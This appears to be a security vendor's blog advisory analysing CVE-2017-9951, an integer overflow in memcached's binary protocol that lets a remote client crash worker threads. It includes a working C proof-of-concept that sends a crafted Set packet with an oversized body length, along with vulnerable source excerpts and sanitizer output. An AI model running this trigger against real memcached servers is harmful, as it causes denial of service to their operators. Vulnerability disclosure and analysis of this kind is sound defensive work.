Security Risk: Low
Exploitation Level: Easy/Remote
Affected Versions: Memcached 1.4.38 and prior versions
Vulnerability: Integer overflow
CVE: CVE-2017-9951

Summary

Memcached is a high-performance, distributed memory object caching system, generic in nature, but originally intended for use in speeding up dynamic web applications by alleviating database load. You can think of it as a short-term memory for your applications.

Memcached supports two protocols for storing and retrieving data: an ASCII-based one and a binary one. The binary protocol is optimized for size, and each binary command has its own representative opcode.

An integer overflow can be triggered by issuing a binary command that adds or replaces an existing key-value pair, leading to a remote denial of service of the memcached server by crashing some of its worker threads. Note that the server process itself will not crash: memcached keeps spawning new worker threads, which in turn can be crashed again and again, potentially killing all workers repeatedly and draining server resources.

The affected commands are Set, Add, Replace, SetQ, AddQ and ReplaceQ, all of which call into the process_bin_update function.
Any deployment of memcached < 1.4.39 is vulnerable, including the Docker Hub image, which has over 10 million pulls.
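
For reference, these are the opcodes of the affected commands as defined in protocol_binary.h (abridged here to the relevant entries):

typedef enum {
    PROTOCOL_BINARY_CMD_SET      = 0x01,
    PROTOCOL_BINARY_CMD_ADD      = 0x02,
    PROTOCOL_BINARY_CMD_REPLACE  = 0x03,
    PROTOCOL_BINARY_CMD_SETQ     = 0x11,
    PROTOCOL_BINARY_CMD_ADDQ     = 0x12,
    PROTOCOL_BINARY_CMD_REPLACEQ = 0x13
} protocol_binary_command;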

The vulnerability was discovered by reviewing the code and the commits that followed version 1.4.31, and it is in fact the result of an insufficient fix for a year-old vulnerability that was assigned CVE-2016-8705.

The generic binary request consists of a fixed 24-byte header, followed by the command-specific extras, the key and the value.

The request header format matches the protocol_binary_request_header structure quoted later in this post: magic, opcode, key length, extras length, data type, reserved, total body length, opaque and CAS.
A single crafted store request is enough to trigger the vulnerability, and the crash can be observed under Valgrind or AddressSanitizer (ASAN).
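
Here is a minimal sketch of a client that sends such a trigger packet, assuming a vulnerable memcached (< 1.4.39) listening on 127.0.0.1:11211. The field values are illustrative; the essential ingredient is a bodylen large enough to make the value-length computation shown below wrap into a negative number:

/* poc.c - sketch of a CVE-2017-9951 trigger (illustrative values).
 * Build: cc poc.c -o poc */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    /* 24-byte header + 8 bytes of extras + 10 bytes of key, zero-filled */
    unsigned char pkt[24 + 8 + 10] = {0};

    pkt[0] = 0x80;                              /* magic: request         */
    pkt[1] = 0x01;                              /* opcode: Set            */
    pkt[3] = 0x0a;                              /* keylen = 10, big-endian */
    pkt[4] = 0x08;                              /* extlen = 8 (flags+exp) */
    pkt[8] = pkt[9] = pkt[10] = pkt[11] = 0xff; /* bodylen = 0xffffffff   */

    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = {0};
    sa.sin_family = AF_INET;
    sa.sin_port = htons(11211);
    inet_pton(AF_INET, "127.0.0.1", &sa.sin_addr);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    write(s, pkt, sizeof(pkt));
    close(s);
    return 0;
}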

Down the rabbit hole

Our journey begins after the server has read the key we are trying to add and lands in the process_bin_update function, where the integer overflow happens:

static void process_bin_update(conn *c) {
    char *key;
    int nkey;   // [a]
    int vlen;   // [b]
    item *it;
    protocol_binary_request_set* req = binary_get_request(c);

    assert(c != NULL);

    key = binary_get_key(c);
    nkey = c->binary_header.request.keylen;

    /* fix byteorder in the request */
    req->message.body.flags = ntohl(req->message.body.flags);
    req->message.body.expiration = ntohl(req->message.body.expiration);

    vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen); // [c]

Notice that nkey [a] and vlen [b] are of type int, while bodylen is defined in protocol_binary.h as an unsigned integer:
typedef union {
    struct {
        uint8_t magic;
        uint8_t opcode;
        uint16_t keylen;
        uint8_t extlen;
        uint8_t datatype;
        uint16_t reserved;
        uint32_t bodylen;
        uint32_t opaque;
        uint64_t cas;
    } request;
    uint8_t bytes[24];
} protocol_binary_request_header;

Because of the difference in signedness between bodylen and vlen, an integer overflow can occur, resulting in a negative value of vlen at [c].
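
A standalone illustration of the wrap (the values are examples, not taken from the post):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint32_t bodylen = 0xffffffff;  /* attacker-controlled header field */
    int nkey = 10;                  /* keylen from the request header   */
    uint8_t extlen = 8;             /* flags + expiration for Set       */

    /* The subtraction happens in unsigned arithmetic; storing the huge
     * result in a signed int goes negative on two's-complement platforms. */
    int vlen = bodylen - (nkey + extlen);
    printf("vlen = %d\n", vlen);    /* prints: vlen = -19 */
    return 0;
}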
Once we have a negative vlen value, the server goes on and tries to allocate the item:

it = item_alloc(key, nkey, req->message.body.flags,
                realtime(req->message.body.expiration), vlen+2);

This is the exploitable part of CVE-2016-8705, but this time we cannot achieve code execution: the fix was implemented inside the item_alloc function, where the arbitrary write could previously be achieved with the help of the negative vlen value.
Now, with the fix in place, item_alloc returns 0 and the server lands inside this code:


if (it == 0) {
    enum store_item_type status;
    if (! item_size_ok(nkey, req->message.body.flags, vlen + 2)) {
        write_bin_error(c, PROTOCOL_BINARY_RESPONSE_E2BIG, NULL, vlen);
        status = TOO_LARGE;
    } else {
        out_of_memory(c, "SERVER_ERROR Out of memory allocating item");
        /* This error generating method eats the swallow value. Add here. */
        c->sbytes = vlen;
        status = NO_MEMORY;
The function item_size_ok returns true if an item will fit in the cache, i.e. its size does not exceed the maximum for a cache entry.

So if the item size checks out, the server sets sbytes to our negative vlen value, and this is exactly where we want to end up: sbytes is later used as an indicator of leftover data that the server still has to read from the connection.

Let’s peek inside item_size_ok:

bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
    char prefix[40];
    uint8_t nsuffix;

    size_t ntotal = item_make_header(nkey + 1, flags, nbytes, prefix, &nsuffix);
    if (settings.use_cas) {
        ntotal += sizeof(uint64_t);
    }

    return slabs_clsid(ntotal) != 0;
}

As you can see, as long as slabs_clsid(ntotal) is not 0, the item size is considered OK.

But as there are no checks or restrictions here, the negative nbytes is accepted and simply folded into ntotal, slabs_clsid returns the smallest slab class (1), and we get past the item_size_ok check, landing in c->sbytes = vlen; which now assigns a negative value.
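
To see why the check passes, here is a rough sketch of the arithmetic with illustrative constants (item_make_header itself is not quoted in this post; it essentially returns sizeof(item) + nkey + nsuffix + nbytes):

#include <stdio.h>

int main(void) {
    int item_header = 48;   /* assumed sizeof(item)                     */
    int nkey        = 11;   /* key length + 1                           */
    int nsuffix     = 8;    /* length of the " flags nbytes\r\n" suffix */
    int nbytes      = -17;  /* our negative vlen + 2                    */

    size_t ntotal = item_header + nkey + nsuffix + nbytes;
    printf("ntotal = %zu\n", ntotal);  /* 50: a tiny, valid-looking size */
    /* slabs_clsid(50) maps to the smallest slab class, which is non-zero,
     * so item_size_ok() returns true despite the negative value length. */
    return 0;
}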

At this stage the server moves into the conn_swallow state and uses our negative sbytes when trying to read from the socket:

case conn_swallow:
    /* we are reading sbytes and throwing them away */
    if (c->sbytes == 0) {
        conn_set_state(c, conn_new_cmd);
        break;
    }

    /* first check if we have leftovers in the conn_read buffer */
    if (c->rbytes > 0) {
        int tocopy = c->rbytes > c->sbytes ? c->sbytes : c->rbytes; // [a]
        c->sbytes -= tocopy;
        c->rcurr += tocopy; // [b]
        c->rbytes -= tocopy;
        break;
    }
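
A standalone rerun of this arithmetic with illustrative values (matching the vlen = -19 from the earlier example) shows what goes wrong:

#include <stdio.h>

int main(void) {
    char rbuf[64];            /* stand-in for the connection read buffer */
    char *rcurr = rbuf + 32;  /* current read position                   */
    int  rbytes = 5;          /* a few unread bytes left in the buffer   */
    int  sbytes = -19;        /* our negative vlen                       */

    /* rbytes (5) > sbytes (-19), so tocopy gets the NEGATIVE value [a] */
    int tocopy = rbytes > sbytes ? sbytes : rbytes;
    sbytes -= tocopy;         /* becomes 0: the swallow "completes"      */
    rcurr  += tocopy;         /* moves BACKWARDS by 19 bytes [b]         */
    rbytes -= tocopy;         /* inflated from 5 to 24                   */

    printf("tocopy=%d sbytes=%d rbytes=%d offset=%td\n",
           tocopy, sbytes, rbytes, rcurr - rbuf);
    /* In the real server rcurr can end up before the start of the read
     * buffer, and that stale pointer is what try_read_command parses next. */
    return 0;
}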

As our sbytes is a negative value, the condition at [a] is true and the negative sbytes is assigned to tocopy; c->rcurr is then moved backwards at [b] and c->rbytes is inflated, so the next call to try_read_command parses a request header from memory we never sent:

static int try_read_command(conn *c) {
    assert(c != NULL);
    assert(c->rcurr <= (c->rbuf + c->rsize));
    assert(c->rbytes > 0);
    ...
    req = (protocol_binary_request_header*)c->rcurr;
    ...

    c->binary_header = *req;
    c->binary_header.request.keylen = ntohs(req->request.keylen);
    c->binary_header.request.bodylen = ntohl(req->request.bodylen);
    c->binary_header.request.cas = ntohll(req->request.cas);

At this point the heap overflow kicks in. Here is the confirmation from ASAN:

==19472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00003ca68 at pc 0x00000043fd92 bp 0x7fcc500fdb30 sp 0x7fcc500fdb20
READ of size 1 at 0x61d00003ca68 thread T2
#0 0x43fd91 in try_read_command /home/da5h/Downloads/memcached-1.4.37/memcached.c:4307
#1 0x43fd91 in drive_machine /home/da5h/Downloads/memcached-1.4.37/memcached.c:4820
#2 0x7fcc53cd1841 in event_persist_closure /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1580
#3 0x7fcc53cd1841 in event_process_active_single_queue /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1639
#4 0x7fcc53cd23ae in event_process_active /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1738
#5 0x7fcc53cd23ae in event_base_loop /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1961
#6 0x4814eb in worker_libevent /home/da5h/Downloads/memcached-1.4.37/thread.c:356
#7 0x7fcc53a996b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
#8 0x7fcc537cf3dc in clone (/lib/x86_64-linux-gnu/libc.so.6+0x1073dc)

0x61d00003ca68 is located 24 bytes to the left of 2048-byte region [0x61d00003ca80,0x61d00003d280)
allocated by thread T2 here:
#0 0x7fcc53f9d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x442ec1 in conn_new /home/da5h/Downloads/memcached-1.4.37/memcached.c:504

Thread T2 created by T0 here:
#0 0x7fcc53f3b253 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x36253)
#1 0x487057 in create_worker /home/da5h/Downloads/memcached-1.4.37/thread.c:282
#2 0x487057 in memcached_thread_init /home/da5h/Downloads/memcached-1.4.37/thread.c:772

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/da5h/Downloads/memcached-1.4.37/memcached.c:4307 try_read_command
Shadow bytes around the buggy address:
0x0c3a7ffff8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7ffff920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7ffff930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c3a7ffff940: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa
0x0c3a7ffff950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==19472==ABORTING

Final Thoughts

This vulnerability is a good example of how bugs are found and fixed, and an even better example of why developers shouldn't rush to patch things up as fast as possible without sufficient testing.

Although this vulnerability is the result of an insufficient fix and was previously overlooked by the reporter of the earlier vulnerability, the maintainer of memcached responded to the report in a quick and professional manner and fixed the problem in version 1.4.39.

Stay tuned to our blog and Twitter account to get the latest cloud native security news and alerts like this!
